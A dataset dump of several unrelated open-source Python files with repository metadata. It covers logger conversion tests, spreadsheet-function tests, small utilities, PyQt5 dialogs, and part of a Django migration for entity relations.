] | 1
|
2021-12-26T09:04:12.000Z
|
2021-12-26T09:04:12.000Z
|
python/sdk/test/logger_test.py
|
ibnummuhammad/merlin
|
acf10a350bcacfdfe67f7020d535467b71ff1d89
|
[
"Apache-2.0"
] | null | null | null |
python/sdk/test/logger_test.py
|
ibnummuhammad/merlin
|
acf10a350bcacfdfe67f7020d535467b71ff1d89
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Merlin Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import client
from merlin.logger import Logger,LoggerMode,LoggerConfig
@pytest.mark.unit
def test_from_logger_response():
    """Logger.from_logger_response should mirror the client response object."""

    def assert_config_equal(actual, expected):
        # Field-by-field comparison of a LoggerConfig pair.
        assert actual is not None
        assert actual.enabled == expected.enabled
        assert actual.mode == expected.mode

    # Model-only response.
    response = client.Logger(model=client.LoggerConfig(enabled=True, mode=client.LoggerMode.RESPONSE))
    converted = Logger.from_logger_response(response)
    expected = Logger(model=LoggerConfig(enabled=True, mode=LoggerMode.RESPONSE))
    assert_config_equal(converted.model, expected.model)
    assert converted.transformer is None

    # An empty mode string falls back to LoggerMode.ALL.
    response = client.Logger(model=client.LoggerConfig(enabled=False, mode=""))
    converted = Logger.from_logger_response(response)
    expected = Logger(model=LoggerConfig(enabled=False, mode=LoggerMode.ALL))
    assert_config_equal(converted.model, expected.model)
    assert converted.transformer is None

    # Transformer-only response.
    response = client.Logger(transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.REQUEST))
    converted = Logger.from_logger_response(response)
    expected = Logger(transformer=LoggerConfig(enabled=True, mode=LoggerMode.REQUEST))
    assert_config_equal(converted.transformer, expected.transformer)
    assert converted.model is None

    # Both model and transformer configured.
    response = client.Logger(model=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL),
                             transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL))
    converted = Logger.from_logger_response(response)
    expected = Logger(model=LoggerConfig(enabled=True, mode=LoggerMode.ALL),
                      transformer=LoggerConfig(enabled=True, mode=LoggerMode.ALL))
    assert_config_equal(converted.transformer, expected.transformer)
    assert_config_equal(converted.model, expected.model)

    # A missing response yields an empty Logger.
    converted = Logger.from_logger_response(None)
    assert converted.model is None
    assert converted.transformer is None
@pytest.mark.unit
def test_to_logger_spec():
    """Logger.to_logger_spec should produce the equivalent client object."""

    def assert_config_equal(actual, expected):
        # Field-by-field comparison of a LoggerConfig pair.
        assert actual is not None
        assert actual.enabled == expected.enabled
        assert actual.mode == expected.mode

    # Model-only logger.
    spec = Logger(model=LoggerConfig(enabled=False, mode=LoggerMode.REQUEST)).to_logger_spec()
    expected = client.Logger(model=client.LoggerConfig(enabled=False, mode=client.LoggerMode.REQUEST))
    assert_config_equal(spec.model, expected.model)
    assert spec.transformer is None

    # Transformer-only logger.
    spec = Logger(transformer=LoggerConfig(enabled=True, mode=LoggerMode.RESPONSE)).to_logger_spec()
    expected = client.Logger(transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.RESPONSE))
    assert_config_equal(spec.transformer, expected.transformer)
    assert spec.model is None

    # Both model and transformer configured.
    spec = Logger(model=LoggerConfig(enabled=True, mode=LoggerMode.ALL),
                  transformer=LoggerConfig(enabled=True, mode=LoggerMode.ALL)).to_logger_spec()
    expected = client.Logger(model=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL),
                             transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL))
    assert_config_equal(spec.transformer, expected.transformer)
    assert_config_equal(spec.model, expected.model)

    # An unconfigured logger produces no spec at all.
    assert Logger().to_logger_spec() is None
| 48.928571
| 115
| 0.762044
| 598
| 4,795
| 6.01505
| 0.147157
| 0.116764
| 0.085071
| 0.105088
| 0.830692
| 0.790381
| 0.777592
| 0.730331
| 0.720879
| 0.710314
| 0
| 0.001968
| 0.152033
| 4,795
| 97
| 116
| 49.43299
| 0.882686
| 0.115954
| 0
| 0.685714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.028571
| false
| 0
| 0.042857
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e0ef6e3eb7ec754c6ff564a4bfd5f7d8c5ce958
| 262
|
py
|
Python
|
superbench/monitor/__init__.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 59
|
2021-04-12T09:44:23.000Z
|
2022-03-27T14:33:46.000Z
|
superbench/monitor/__init__.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 275
|
2021-03-29T06:40:34.000Z
|
2022-03-30T07:35:49.000Z
|
superbench/monitor/__init__.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 24
|
2021-04-09T12:42:27.000Z
|
2022-03-16T08:26:34.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
"""Exposes interfaces of SuperBench Monitor."""
from superbench.monitor.monitor import Monitor
from superbench.monitor.record import MonitorRecord
__all__ = ['Monitor', 'MonitorRecord']
| 26.2
| 51
| 0.78626
| 29
| 262
| 6.965517
| 0.655172
| 0.252475
| 0.207921
| 0.277228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118321
| 262
| 9
| 52
| 29.111111
| 0.874459
| 0.423664
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e2ec6aafc2b620a6cf6b689d6b6cf9133b067a9
| 194
|
py
|
Python
|
rasa_core/actions/__init__.py
|
ebarahona/rasa_core
|
f3dbb70d0bb748628ab238eded17a8f5e09279e2
|
[
"Apache-2.0"
] | 46
|
2017-11-16T06:03:48.000Z
|
2022-03-06T18:25:15.000Z
|
rasa_core/actions/__init__.py
|
ebarahona/rasa_core
|
f3dbb70d0bb748628ab238eded17a8f5e09279e2
|
[
"Apache-2.0"
] | null | null | null |
rasa_core/actions/__init__.py
|
ebarahona/rasa_core
|
f3dbb70d0bb748628ab238eded17a8f5e09279e2
|
[
"Apache-2.0"
] | 21
|
2018-02-05T09:59:40.000Z
|
2020-09-24T14:39:16.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from rasa_core.actions.action import Action
| 27.714286
| 43
| 0.881443
| 26
| 194
| 5.807692
| 0.5
| 0.264901
| 0.423841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108247
| 194
| 6
| 44
| 32.333333
| 0.872832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e3354d1ca1e9c318c7b6ebdbcac7b4fe2d0809c
| 175
|
py
|
Python
|
WebApp/utils.py
|
CSCIX691DAL/AISExplore
|
2826e4eefb156b890d2f08d0ca60bc8a8ea8f94e
|
[
"MIT"
] | null | null | null |
WebApp/utils.py
|
CSCIX691DAL/AISExplore
|
2826e4eefb156b890d2f08d0ca60bc8a8ea8f94e
|
[
"MIT"
] | 1
|
2021-07-07T02:14:35.000Z
|
2021-07-07T02:14:35.000Z
|
WebApp/utils.py
|
CSCIX691DAL/AISExplore
|
2826e4eefb156b890d2f08d0ca60bc8a8ea8f94e
|
[
"MIT"
] | null | null | null |
from RealTimeAIS.settings import DATABASE_NAME,PORT_NUMBER
from pymongo import MongoClient
def get_database():
    """Return a handle to the configured MongoDB database.

    Connects to the local MongoDB instance on ``PORT_NUMBER`` and looks up
    the database named ``DATABASE_NAME`` (both from RealTimeAIS.settings).
    """
    connection = MongoClient(port=PORT_NUMBER)
    return getattr(connection, DATABASE_NAME)
| 35
| 63
| 0.845714
| 23
| 175
| 6.217391
| 0.608696
| 0.167832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091429
| 175
| 5
| 63
| 35
| 0.899371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2e7a2a18a762eb783d383ee79203b7d8c606b374
| 5,986
|
py
|
Python
|
tests/test_information.py
|
uncountableinc/hotxlfp
|
8e5bf9a27140d87caa3423e918d42a2a5e7075b5
|
[
"MIT"
] | 24
|
2019-04-15T17:51:42.000Z
|
2022-01-05T10:22:47.000Z
|
tests/test_information.py
|
aidhound/hotxlfp
|
82f47586d39092bfb7a112619046e842b343f860
|
[
"MIT"
] | 11
|
2019-11-03T13:31:08.000Z
|
2022-02-23T20:09:31.000Z
|
tests/test_information.py
|
uncountableinc/hotxlfp
|
8e5bf9a27140d87caa3423e918d42a2a5e7075b5
|
[
"MIT"
] | 8
|
2019-06-04T08:49:45.000Z
|
2021-08-16T19:39:50.000Z
|
# -*- coding: utf-8 -*-
import unittest
from hotxlfp import Parser
class TestStatistical(unittest.TestCase):
def test_error_type(self):
p = Parser(debug=True)
ret = p.parse('ERROR.TYPE(1/0)')
self.assertEqual(ret['result'], 2)
self.assertEqual(ret['error'], None)
def test_iserr(self):
p = Parser(debug=True)
ret = p.parse('ISERR(1/0)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_iserror(self):
p = Parser(debug=True)
ret = p.parse('ISERROR(1/0)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
p = Parser(debug=True)
ret = p.parse('ISERROR(1/2)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_iseven(self):
p = Parser(debug=True)
ret = p.parse('ISEVEN(1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(-1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(2)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(-2)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(1000)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN("A")')
self.assertEqual(ret['result'], None)
self.assertEqual(ret['error'], '#VALUE!')
ret = p.parse('ISEVEN(2.21)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_isodd(self):
p = Parser(debug=True)
ret = p.parse('ISODD(1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(-1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(2)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(-2)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(1000)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD("A")')
self.assertEqual(ret['result'], None)
self.assertEqual(ret['error'], '#VALUE!')
ret = p.parse('ISODD(2.21)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_istext(self):
p = Parser(debug=True)
ret = p.parse('ISTEXT("foo")')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISTEXT(NA())')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISTEXT(1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_isnumber(self):
p = Parser(debug=True)
ret = p.parse('ISNUMBER("foo")')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNUMBER(TRUE)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNUMBER(NA())')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNUMBER(1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_islogical(self):
    """ISLOGICAL is True only for boolean arguments."""
    parser = Parser(debug=True)
    for formula, expected_result in (
        ('ISLOGICAL("foo")', False),
        ('ISLOGICAL(TRUE)', True),
        ('ISLOGICAL(NA())', False),
        ('ISLOGICAL(1)', False),
    ):
        outcome = parser.parse(formula)
        self.assertEqual(outcome['result'], expected_result)
        self.assertEqual(outcome['error'], None)
def test_isna(self):
    """ISNA is True only for the #N/A error, not for other errors (e.g. 1/0)."""
    parser = Parser(debug=True)
    for formula, expected_result in (
        ('ISNA(NA())', True),
        ('ISNA(1/0)', False),
    ):
        outcome = parser.parse(formula)
        self.assertEqual(outcome['result'], expected_result)
        self.assertEqual(outcome['error'], None)
def test_isnontext(self):
    """ISNONTEXT is the complement of ISTEXT: True for anything but strings."""
    parser = Parser(debug=True)
    for formula, expected_result in (
        ('ISNONTEXT("foo")', False),
        ('ISNONTEXT(NA())', True),
        ('ISNONTEXT(1)', True),
    ):
        outcome = parser.parse(formula)
        self.assertEqual(outcome['result'], expected_result)
        self.assertEqual(outcome['error'], None)
def test_n(self):
    """N: numbers pass through, text -> 0, TRUE/FALSE -> 1/0,
    and dates convert to their DATEVALUE serial number."""
    parser = Parser(debug=True)
    for formula, expected_result in (
        ('N(1)', 1),
        ('N("1024")', 0),
        ('N("foo")', 0),
        ('N(TRUE())', 1),
        ('N(FALSE())', 0),
    ):
        outcome = parser.parse(formula)
        self.assertEqual(outcome['result'], expected_result)
        self.assertEqual(outcome['error'], None)
    # N applied to a date must agree with DATEVALUE for the same date.
    n_today = parser.parse('N(TODAY())')
    datevalue_today = parser.parse('DATEVALUE(TODAY())')
    self.assertEqual(n_today['result'], datevalue_today['result'])
    self.assertEqual(n_today['error'], None)
| 36.723926
| 55
| 0.566321
| 720
| 5,986
| 4.691667
| 0.066667
| 0.35524
| 0.426288
| 0.284192
| 0.915038
| 0.903789
| 0.893724
| 0.883659
| 0.801954
| 0.760213
| 0
| 0.011086
| 0.246575
| 5,986
| 162
| 56
| 36.950617
| 0.737916
| 0.003508
| 0
| 0.612245
| 0
| 0
| 0.154956
| 0
| 0
| 0
| 0
| 0
| 0.544218
| 1
| 0.07483
| false
| 0
| 0.013605
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d8918f1419b92b7f26ec03ce9b08311924c3e159
| 135
|
py
|
Python
|
object_detection/project_path.py
|
MourabitElBachir/visual-recognition-server-control-back
|
49ec2a459e8c418a395340d2d3f876af400cb75c
|
[
"MIT"
] | null | null | null |
object_detection/project_path.py
|
MourabitElBachir/visual-recognition-server-control-back
|
49ec2a459e8c418a395340d2d3f876af400cb75c
|
[
"MIT"
] | null | null | null |
object_detection/project_path.py
|
MourabitElBachir/visual-recognition-server-control-back
|
49ec2a459e8c418a395340d2d3f876af400cb75c
|
[
"MIT"
] | null | null | null |
import os
def get_correct_path(files):
    """Resolve *files* relative to the project root.

    The project root is taken to be the parent of the directory that
    contains this module (i.e. two levels up from this file).
    """
    module_dir = os.path.dirname(os.path.abspath(__file__))
    project_root = os.path.dirname(module_dir)
    return os.path.join(project_root, files)
| 19.285714
| 92
| 0.740741
| 22
| 135
| 4.272727
| 0.545455
| 0.255319
| 0.276596
| 0.319149
| 0.340426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 135
| 6
| 93
| 22.5
| 0.783333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
2b6b4eeb3b8df5d884dba4fb4dd003f2611a8e71
| 202
|
py
|
Python
|
2018-01/01_Jan/19/_09_doc.py
|
z727354123/pyCharmTest
|
9cbd770e19929cb4feb3be2f13b60dc0b1f68b56
|
[
"Apache-2.0"
] | null | null | null |
2018-01/01_Jan/19/_09_doc.py
|
z727354123/pyCharmTest
|
9cbd770e19929cb4feb3be2f13b60dc0b1f68b56
|
[
"Apache-2.0"
] | null | null | null |
2018-01/01_Jan/19/_09_doc.py
|
z727354123/pyCharmTest
|
9cbd770e19929cb4feb3be2f13b60dc0b1f68b56
|
[
"Apache-2.0"
] | null | null | null |
class Person:
    # NOTE: this docstring is printed at module level via Person.__doc__, so
    # its bytes must not change. English translation of the Chinese text:
    # "This is a Person class. Instance attributes: None: nothing at all."
    '''
    这是一个 Person类
    实例属性:
    None: 没有任何东西
    '''
# Demonstrate that __doc__ is an ordinary, writable class attribute:
# print the original docstring, overwrite it, and print it again.
divider = '--------'
print(divider)
print(Person.__doc__)
print(divider)
Person.__doc__ = "三扥东方"  # replace the docstring at runtime
print(Person.__doc__)
print(divider)
| 13.466667
| 23
| 0.514851
| 19
| 202
| 4.842105
| 0.526316
| 0.358696
| 0.456522
| 0.413043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212871
| 202
| 14
| 24
| 14.428571
| 0.578616
| 0.173267
| 0
| 0.714286
| 0
| 0
| 0.195804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0.142857
| 0.714286
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
2b77008476af200bdf16f17ef550d540123c445c
| 272
|
py
|
Python
|
uncollapse-digits/golfed.py
|
JoelAtDeluxe/GolfChallenges
|
e86a4d85476bd03f6b32a45e77f1aace56f8d94e
|
[
"MIT"
] | null | null | null |
uncollapse-digits/golfed.py
|
JoelAtDeluxe/GolfChallenges
|
e86a4d85476bd03f6b32a45e77f1aace56f8d94e
|
[
"MIT"
] | null | null | null |
uncollapse-digits/golfed.py
|
JoelAtDeluxe/GolfChallenges
|
e86a4d85476bd03f6b32a45e77f1aace56f8d94e
|
[
"MIT"
] | null | null | null |
def uncollapse(s):
    """Insert a space after every spelled-out digit word in *s*.

    Assumes *s* is a run of concatenated digit words ("onetwothree");
    the space appended after the final word is trimmed before returning.
    """
    digit_words = ('zero', 'one', 'two', 'three', 'four',
                   'five', 'six', 'seven', 'eight', 'nine')
    for word in digit_words:
        s = s.replace(word, word + ' ')
    return s[:-1]
def G(s):
    """Golfed alias of uncollapse: space-separate concatenated digit words.

    Kept as an independent duplicate on purpose (this is a code-golf file).
    """
    words = ('zero', 'one', 'two', 'three', 'four',
             'five', 'six', 'seven', 'eight', 'nine')
    for w in words:
        s = s.replace(w, w + ' ')
    return s[:-1]
| 27.2
| 82
| 0.547794
| 48
| 272
| 3.104167
| 0.416667
| 0.053691
| 0.067114
| 0.09396
| 0.885906
| 0.885906
| 0.885906
| 0.885906
| 0.885906
| 0.885906
| 0
| 0.00823
| 0.106618
| 272
| 9
| 83
| 30.222222
| 0.604938
| 0
| 0
| 0.75
| 0
| 0
| 0.301471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9966439ff844ca51d15b06f014fb6d5dad1ae8e2
| 893
|
py
|
Python
|
utils/dialogs.py
|
4rzael/krocs
|
42cb0a806d4c5a9350fca84a0258817bf6a9c154
|
[
"MIT"
] | 5
|
2018-05-07T12:57:58.000Z
|
2020-07-08T01:46:39.000Z
|
utils/dialogs.py
|
4rzael/krocs
|
42cb0a806d4c5a9350fca84a0258817bf6a9c154
|
[
"MIT"
] | null | null | null |
utils/dialogs.py
|
4rzael/krocs
|
42cb0a806d4c5a9350fca84a0258817bf6a9c154
|
[
"MIT"
] | null | null | null |
""" PyQt5 imports. """
from PyQt5.QtWidgets import QMessageBox
def show_error(text, info_text, detail_text):
    """Show a modal critical-error dialog with an OK button.

    *text* is the main message; *info_text* and *detail_text* are optional
    secondary texts — pass None to omit either one.
    """
    dialog = QMessageBox()
    dialog.setWindowTitle("Critical")
    dialog.setIcon(QMessageBox.Critical)
    dialog.setText(text)
    if info_text is not None:
        dialog.setInformativeText(info_text)
    if detail_text is not None:
        dialog.setDetailedText(detail_text)
    dialog.setStandardButtons(QMessageBox.Ok)
    # Clicking any button simply dismisses the dialog.
    dialog.buttonClicked.connect(dialog.close)
    dialog.exec_()
def show_info(text, info_text, detail_text):
    """Show a modal informational dialog with an OK button.

    *text* is the main message; *info_text* and *detail_text* are optional
    secondary texts — pass None to omit either one.
    """
    dialog = QMessageBox()
    dialog.setWindowTitle("Information")
    dialog.setIcon(QMessageBox.Information)
    dialog.setText(text)
    if info_text is not None:
        dialog.setInformativeText(info_text)
    if detail_text is not None:
        dialog.setDetailedText(detail_text)
    dialog.setStandardButtons(QMessageBox.Ok)
    # Clicking any button simply dismisses the dialog.
    dialog.buttonClicked.connect(dialog.close)
    dialog.exec_()
| 27.90625
| 45
| 0.714446
| 109
| 893
| 5.706422
| 0.275229
| 0.090032
| 0.083601
| 0.083601
| 0.826367
| 0.726688
| 0.726688
| 0.726688
| 0.726688
| 0.726688
| 0
| 0.002755
| 0.18701
| 893
| 31
| 46
| 28.806452
| 0.853994
| 0.015677
| 0
| 0.72
| 0
| 0
| 0.021814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9979e76414080e8f53b8bc49168e295079064912
| 12,708
|
py
|
Python
|
apis_core/apis_relations/migrations/0002_auto_20200121_1227.py
|
acdh-oeaw/apis-core
|
f7ece05eec46c820321fd28d3e947653dcb98ae7
|
[
"MIT"
] | 11
|
2018-07-11T18:11:40.000Z
|
2022-03-25T11:07:12.000Z
|
apis_core/apis_relations/migrations/0002_auto_20200121_1227.py
|
acdh-oeaw/apis-core
|
f7ece05eec46c820321fd28d3e947653dcb98ae7
|
[
"MIT"
] | 309
|
2018-06-11T08:38:50.000Z
|
2022-03-31T13:45:22.000Z
|
apis_core/apis_relations/migrations/0002_auto_20200121_1227.py
|
acdh-oeaw/apis-core
|
f7ece05eec46c820321fd28d3e947653dcb98ae7
|
[
"MIT"
] | 5
|
2017-08-21T10:37:07.000Z
|
2021-09-27T19:08:47.000Z
|
# Generated by Django 2.1.12 on 2020-01-21 12:27
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (see header comment) — do not hand-edit logic.
    # Adds the ForeignKey columns for every pairwise relation model
    # (Person/Place/Institution/Event/Work cross products): each relation row
    # points at its two endpoint entities and at a vocabulary relation type.
    # Symmetric models (e.g. placeplace) use A/B related_names so each side
    # is reachable from the other.

    initial = True

    dependencies = [
        ('apis_vocabularies', '0001_initial'),
        ('apis_relations', '0001_initial'),
        ('apis_entities', '0002_auto_20200121_1227'),
    ]

    operations = [
        migrations.AddField(
            model_name='workwork',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='workwork_set', to='apis_vocabularies.WorkWorkRelation'),
        ),
        migrations.AddField(
            model_name='placework',
            name='related_place',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placework_set', to='apis_entities.Place'),
        ),
        migrations.AddField(
            model_name='placework',
            name='related_work',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placework_set', to='apis_entities.Work'),
        ),
        migrations.AddField(
            model_name='placework',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placework_set', to='apis_vocabularies.PlaceWorkRelation'),
        ),
        # Symmetric place<->place relation: A/B ends cross-reference each other.
        migrations.AddField(
            model_name='placeplace',
            name='related_placeA',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_placeB', to='apis_entities.Place'),
        ),
        migrations.AddField(
            model_name='placeplace',
            name='related_placeB',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_placeA', to='apis_entities.Place'),
        ),
        migrations.AddField(
            model_name='placeplace',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeplace_set', to='apis_vocabularies.PlacePlaceRelation'),
        ),
        migrations.AddField(
            model_name='placeevent',
            name='related_event',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeevent_set', to='apis_entities.Event'),
        ),
        migrations.AddField(
            model_name='placeevent',
            name='related_place',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeevent_set', to='apis_entities.Place'),
        ),
        migrations.AddField(
            model_name='placeevent',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeevent_set', to='apis_vocabularies.PlaceEventRelation'),
        ),
        migrations.AddField(
            model_name='personwork',
            name='related_person',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personwork_set', to='apis_entities.Person'),
        ),
        migrations.AddField(
            model_name='personwork',
            name='related_work',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personwork_set', to='apis_entities.Work'),
        ),
        migrations.AddField(
            model_name='personwork',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personwork_set', to='apis_vocabularies.PersonWorkRelation'),
        ),
        migrations.AddField(
            model_name='personplace',
            name='related_person',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personplace_set', to='apis_entities.Person'),
        ),
        migrations.AddField(
            model_name='personplace',
            name='related_place',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personplace_set', to='apis_entities.Place'),
        ),
        migrations.AddField(
            model_name='personplace',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personplace_set', to='apis_vocabularies.PersonPlaceRelation'),
        ),
        # Symmetric person<->person relation.
        migrations.AddField(
            model_name='personperson',
            name='related_personA',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_personB', to='apis_entities.Person'),
        ),
        migrations.AddField(
            model_name='personperson',
            name='related_personB',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_personA', to='apis_entities.Person'),
        ),
        migrations.AddField(
            model_name='personperson',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personperson_set', to='apis_vocabularies.PersonPersonRelation'),
        ),
